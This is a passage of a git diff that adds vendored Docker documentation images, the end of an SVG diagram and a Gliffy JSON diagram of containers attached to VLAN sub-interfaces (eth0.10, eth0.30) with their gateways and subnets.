font-weight="normal" text-decoration="" line-height="14px" x="46" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="49" y="26">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="56" y="26">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="26">2</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="66" y="26">/</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="69" y="26">16</text></g></g><g transform="matrix(1,0,0,1,67,31)"><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="57" height="14" fill-opacity="0"/></g></g><g transform="translate(8,0) matrix(1,0,0,1,0,0) translate(-8,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="8" y="0" width="41" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="8" y="12">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="35" y="12">30</text></g></g><g transform="matrix(1,0,0,1,5,95)"><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="28" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="75" height="14" fill-opacity="0"/></g></g><g transform="translate(4,0) matrix(1,0,0,1,0,0) translate(-4,0)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="67" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="4" y="12">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="46" y="12">Host</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
new file mode 100644
index 0000000000..4d9f2761c4
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/images/vlans-deeper-look.gliffy
@@ -0,0 +1 @@
+{"contentType":"application/gliffy+json","version":"1.3","stage":{"background":"#FFFFFF","width":566,"height":581,"nodeIndex":500,"autoFit":true,"exportBorder":false,"gridOn":true,"snapToGrid":false,"drawingGuidesOn":false,"pageBreaksOn":false,"printGridOn":false,"printPaper":"LETTER","printShrinkToFit":false,"printPortrait":true,"maxWidth":5000,"maxHeight":5000,"themeData":{"uid":"com.gliffy.theme.beach_day","name":"Beach Day","shape":{"primary":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#AEE4F4","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#004257"}},"secondary":{"strokeWidth":2,"strokeColor":"#CDB25E","fillColor":"#EACF81","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#332D1A"}},"tertiary":{"strokeWidth":2,"strokeColor":"#FFBE00","fillColor":"#FFF1CB","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#000000"}},"highlight":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"#00A4DA","gradient":false,"dropShadow":false,"opacity":1,"text":{"color":"#ffffff"}}},"line":{"strokeWidth":2,"strokeColor":"#00A4DA","fillColor":"none","arrowType":2,"interpolationType":"quadratic","cornerRadius":0,"text":{"color":"#002248"}},"text":{"color":"#002248"},"stage":{"color":"#FFFFFF"}},"viewportType":"default","fitBB":{"min":{"x":-3,"y":-1.0100878848684474},"max":{"x":566,"y":581}},"printModel":{"pageSize":"a4","portrait":false,"fitToOnePage":false,"displayPageBreaks":false},"objects":[{"x":-5.0,"y":-1.0100878848684474,"rotation":0.0,"id":499,"width":569.0,"height":582.0100878848684,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":103,"lockAspectRatio":false,"lockShape":false,"children":[{"x":374.0,"y":44.510087884868476,"rotation":0.0,"id":497,"width":145.0,"height":32.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":101,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Network &amp;&nbsp;</span></span><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">other </span></span></p><p style=\"text-align:center;\"><span style=\"font-size:14px;\"><span style=\"font-weight:bold;\">Docker Hosts</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":157.40277777777783,"y":108.18042331083174,"rotation":0.0,"id":492,"width":121.19444444444446,"height":256.03113588084784,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":99,"lockAspectRatio":false,"lockShape":false,"children":[{"x":-126.13675213675185,"y":31.971494223140525,"rotation":180.0,"id":453,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":57,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.4915197649562,-156.36606993796556],[-121.49151976495622,-99.52846483047983],[-229.68596420939843,-99.52846483047591],[-229.68596420939843,-34.22088765589871]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.82598824786317,"y":137.23816896148608,"rotation":180.0,"id":454,"width":11.1452323717951,"height":61.19357171974171,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":55,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#38761d","fillColor":"#38761d","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.05455395299924,191.93174068122784],[291.05455395299924,106.06051735724502],[186.27677617521402,106.06051735724502],[186.27677617521402,69.78655839914467]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":372.0,"y":332.0100878848684,"rotation":0.0,"id":490,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":97,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":9.5,"rotation":0.0,"id":365,"width":141.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":98,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">&nbsp;Parent: <span style=\"font-weight:bold;\">eth0.30</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN: <span style=\"font-weight:bold;\">30</span></span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":342,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":96,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#eb6c6c","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":52.0,"y":332.0100878848684,"rotation":0.0,"id":489,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":92,"lockAspectRatio":false,"lockShape":false,"children":[{"x":1.0,"y":10.5,"rotation":0.0,"id":367,"width":138.0,"height":40.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":93,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\"><span style=\"\">Parent</span>: <span style=\"font-weight:bold;\">eth0.10</span></span></p><p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">VLAN ID</span><span style=\"font-size:18px;font-family:Arial;\">:</span><span style=\"font-size:18px;font-weight:bold;font-family:Arial;\"> <span style=\"\">10</span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":340,"width":144.0,"height":60.0,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":91,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#5fcc5a","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.99,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":289.40277777777794,"y":126.43727235088903,"rotation":0.0,"id":486,"width":121.19444444444446,"height":250.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":88,"lockAspectRatio":false,"lockShape":false,"children":[{"x":236.18596420940128,"y":158.89044937932732,"rotation":0.0,"id":449,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":53,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[-121.49151976495682,-152.05853787273531],[-121.49151976495682,-81.64750068755309],[-229.68596420940125,-81.64750068755139],[-229.68596420940125,-33.27817949077674]],"lockSegments":{},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":-179.77677617521388,"y":56.523633779319084,"rotation":0.0,"id":450,"width":11.1452323717951,"height":59.50782702798556,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":51,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#cc0000","fillColor":"#cc0000","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":10.0,"controlPath":[[291.0545539529992,186.6444547140887],[291.0545539529992,117.79470574474337],[186.276776175214,117.79470574474337],[186.276776175214,67.8640963321146]],"lockSegments":{"1":true},"ortho":true}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":447.0,"y":150.01008788486848,"rotation":0.0,"id":472,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":87,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":473,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":86,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":474,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":84,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":475,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":82,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":368.0,"y":101.71008483311067,"rotation":0.0,"id":477,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":80,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.30.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":350.51767083236393,"y":87.47159983339776,"rotation":0.0,"id":478,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":79,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#cc0000","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":94.0,"y":155.01008788486848,"rotation":0.0,"id":463,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":78,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":464,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":77,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":465,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":75,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":466,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":73,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":80.0,"y":109.71008483311067,"rotation":0.0,"id":468,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":71,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.10.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.51767083236396,"y":95.47159983339776,"rotation":0.0,"id":469,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":70,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#38761d","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":341.0,"y":40.010087884868476,"rotation":0.0,"id":460,"width":46.99999999999994,"height":27.0,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":69,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":417,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":68,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":5.485490196078445,"y":5.153846153846132,"rotation":0.0,"id":418,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":66,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":9.901960784313701,"y":9.0,"rotation":0.0,"id":419,"width":37.09803921568625,"height":18.000000000000004,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#666666","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":198.51767083236396,"y":41.471599833397754,"rotation":0.0,"id":459,"width":175.20345848455912,"height":79.73848499971291,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":62,"lockAspectRatio":false,"lockShape":false,"children":[{"x":17.482329167636067,"y":14.23848499971291,"rotation":0.0,"id":458,"width":140.0,"height":56.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":61,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:12px;font-family:Arial;\">Gateway&nbsp;</span><span style=\"font-weight:bold;\">10.1.20.1</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;font-weight:bold;\">&nbsp;</span><span style=\"\">&nbsp;and other&nbsp;</span><span style=\"\">containers on the same VLAN/</span><span style=\"\">subnet</span></p><p style=\"text-align:center;\"><span style=\"text-decoration:none;\">&nbsp;</span></p><p style=\"text-align:center;\"></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":0.0,"rotation":0.0,"id":330,"width":175.20345848455912,"height":73.0,"uid":"com.gliffy.shape.cisco.cisco_v1.storage.cloud","order":59,"lockAspectRatio":true,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.cisco.cisco_v1.storage.cloud","strokeWidth":2.0,"strokeColor":"#333333","fillColor":"#ff9900","gradient":false,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":279.0,"y":129.01008788486848,"rotation":0.0,"id":440,"width":5.0,"height":227.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":49,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":6.0,"strokeColor":"#ff9900","fillColor":"#ff9900","dashStyle":"1.0,1.0","startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[4.000000000000057,-25.08952732449731],[4.000000000000114,176.01117206537933]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":56.0,"y":503.0913886978766,"rotation":0.0,"id":386,"width":135.0,"height":20.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":48,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"font-size:18px;font-family:Arial;\">Frontend</span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":62.0,"y":420.0100878848684,"rotation":0.0,"id":381,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":41,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":382,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":44,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":383,"width":98.00597014925374,"height":44.0,"uid":null,"order":47,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span style=\"text-decoration:none;\">Eth0 <span style=\"font-weight:bold;\">10.1.10.0/24</span></span></span></p>","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":8.955223880597016,"y":9.634809634809635,"rotation":0.0,"id":384,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":42,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":17.910447761194032,"y":19.26961926961927,"rotation":0.0,"id":385,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":40,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":382.0,"y":420.0100878848684,"rotation":0.0,"id":376,"width":120.0,"height":74.18803418803415,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":31,"lockAspectRatio":false,"lockShape":false,"children":[{"x":0.0,"y":0.0,"rotation":0.0,"id":377,"width":102.08955223880598,"height":54.91841491841488,"uid":"com.gliffy.shape.basic.basic_v1.default.round_rectangle","order":34,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.round_rectangle.basic_v1","strokeWidth":1.0,"strokeColor":"#434343","fillColor":"#4cacf5","gradient":false,"dashStyle":null,"dropShadow":true,"state":0,"opacity":0.97,"shadowX":4.0,"shadowY":4.0}},"linkMap":[],"children":[{"x":2.0417910447761187,"y":0.0,"rotation":0.0,"id":378,"width":98.00597014925374,"height":44.0,"uid":null,"order":37,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":8,"paddingRight":8,"paddingBottom":8,"paddingLeft":8,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"<p style=\"text-align:center;\"><span style=\"\">Container(s)</span></p><p style=\"text-align:center;\"><span style=\"font-size:13px;text-decoration:none;font-family:Arial;\"><span 